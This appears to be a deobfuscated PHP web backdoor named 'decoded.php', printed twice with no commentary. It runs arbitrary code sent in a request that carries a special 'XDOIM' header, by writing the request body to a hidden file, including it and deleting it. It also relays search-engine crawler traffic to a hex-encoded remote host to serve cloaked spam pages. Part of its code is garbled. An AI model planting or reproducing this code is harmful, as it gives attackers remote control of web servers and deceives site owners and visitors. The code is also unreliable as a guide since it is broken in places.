MichealPearce/decoded.php

## decoded.php
<?php
error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(1);
$ixv = '2.2.17';
$gov = "\x31\61\x30\60\x2e\143\x68\141\x6e\156\x65\154\x6e\144\x61\171\x2e\170\x79\172";
$db = "1100";
$ip = clientip();
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$uri = $_SERVER["REQUEST_URI"];
$host = $_SERVER["HTTP_HOST"];
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : "";
$token = isset($_SERVER['HTTP_XDOIM']) ? $_SERVER['HTTP_XDOIM'] : "";
$proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ? "https" : "http";
$header = array('Lang: ' . $lang, 'User-Agent: ' . $ua, 'Referer: ' . $ur, 'Http-Proto: ' . $proto, 'Http-Host: ' . $host, 'Http-Uri: ' . $uri, 'Dbgroup: ' . $gov, 'Http-X-Forwarded-For: ' . $ip, 'Token: ' . $token);
$postdata = "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri";

if (strlen($token) > 0) {
	@todk(".eGbA0Ty2Wh", @file_get_contents("php://input"), FILE_USE_INCLUDE_PATH);
	echo(include '.eGbA0Ty2Wh');
	unlink('.eGbA0Ty2Wh');
	exit;
}
if (($uri !== "/favicon.ico") && (@preg_match('#google|yahoo|bing#i', $ua) || (@preg_match('#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i', $ur) && @preg_match('#[/\?]([a-z0-9]{1})(\d+)#i', $uri)))) {
	list($cntx, $code, $ctype) = urlx('http://' . $gov . '/index?' . $postdata, $header, $postdata);
	if (stripos($ctype, 'gzip') > 0) {
		@header('Content-type: application/x-gzip');
		exit($cntx);
	}
	if (stripos($cntx, '= 400 && $code < 500'){
		@header('HTTP / 1.1 404 Not Found');
		exit;
	}

    if ($code >= 500){
		@header('HTTP / 1.1 500 Internal Server Error');
		exit;
	}

    if ($cntx!=""){ exit($cntx); }
}

function urlx($url,$header=null,$postdata=null,$ua=null) {
    if (!function_exists('curl_init')){ return; }
    try {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
		curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        ($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
		($ua===null||$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua);

		if ($postdata!==null && $postdata!=="") {
			curl_setopt($ch, CURLOPT_POST, 1);
			curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
		}

		$body = curl_exec($ch);
		$code = curl_getinfo($ch,CURLINFO_HTTP_CODE);
		$ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);
		curl_close($ch);
    } catch (Exception $e) { }   if ($body===false && function_exists('file_get_contents')) {
        ini_set('user_agent', 'Mozilla / 4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)');
        try {
            $body = @file_get_contents($url);
        } catch (Exception $e) { }
    }
    return array($body,$code,$ctype);
}
function todk($fil,$str){@file_put_contents($fil,$str);}
function clientip(){ $realip='';
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== ''){  $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {  $realip = getenv('REMOTE_ADDR');
    } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {  $realip = $_SERVER['REMOTE_ADDR'];
    }
    if (stristr($realip, ',')) { $values = explode(",", $realip); $realip = $values[0]; } return $realip;
}
	<?php
	error_reporting(0);
	@set_time_limit(3600);
	@ignore_user_abort(1);
	$ixv = '2.2.17';
	$gov = "\x31\61\x30\60\x2e\143\x68\141\x6e\156\x65\154\x6e\144\x61\171\x2e\170\x79\172";
	$db = "1100";
	$ip = clientip();
	$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
	$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
	$uri = $_SERVER["REQUEST_URI"];
	$host = $_SERVER["HTTP_HOST"];
	$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : "";
	$token = isset($_SERVER['HTTP_XDOIM']) ? $_SERVER['HTTP_XDOIM'] : "";
	$proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') \|\| (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') \|\| (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ? "https" : "http";
	$header = array('Lang: ' . $lang, 'User-Agent: ' . $ua, 'Referer: ' . $ur, 'Http-Proto: ' . $proto, 'Http-Host: ' . $host, 'Http-Uri: ' . $uri, 'Dbgroup: ' . $gov, 'Http-X-Forwarded-For: ' . $ip, 'Token: ' . $token);
	$postdata = "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri";

	if (strlen($token) > 0) {
	@todk(".eGbA0Ty2Wh", @file_get_contents("php://input"), FILE_USE_INCLUDE_PATH);
	echo(include '.eGbA0Ty2Wh');
	unlink('.eGbA0Ty2Wh');
	exit;
	}
	if (($uri !== "/favicon.ico") && (@preg_match('#google\|yahoo\|bing#i', $ua) \|\| (@preg_match('#google.co.jp\|google.com\|yahoo.com\|yahoo.co.jp\|bing.com#i', $ur) && @preg_match('#[/\?]([a-z0-9]{1})(\d+)#i', $uri)))) {
	list($cntx, $code, $ctype) = urlx('http://' . $gov . '/index?' . $postdata, $header, $postdata);
	if (stripos($ctype, 'gzip') > 0) {
	@header('Content-type: application/x-gzip');
	exit($cntx);
	}
	if (stripos($cntx, '= 400 && $code < 500'){
	@header('HTTP / 1.1 404 Not Found');
	exit;
	}

	if ($code >= 500){
	@header('HTTP / 1.1 500 Internal Server Error');
	exit;
	}

	if ($cntx!=""){ exit($cntx); }
	}

	function urlx($url,$header=null,$postdata=null,$ua=null) {
	if (!function_exists('curl_init')){ return; }
	try {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
	curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
	($ua===null\|\|$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua);

	if ($postdata!==null && $postdata!=="") {
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
	}

	$body = curl_exec($ch);
	$code = curl_getinfo($ch,CURLINFO_HTTP_CODE);
	$ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);
	curl_close($ch);
	} catch (Exception $e) { } if ($body===false && function_exists('file_get_contents')) {
	ini_set('user_agent', 'Mozilla / 4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)');
	try {
	$body = @file_get_contents($url);
	} catch (Exception $e) { }
	}
	return array($body,$code,$ctype);
	}
	function todk($fil,$str){@file_put_contents($fil,$str);}
	function clientip(){ $realip='';
	if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== ''){ $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
	} elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $realip = getenv('REMOTE_ADDR');
	} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $realip = $_SERVER['REMOTE_ADDR'];
	}
	if (stristr($realip, ',')) { $values = explode(",", $realip); $realip = $values[0]; } return $realip;
	}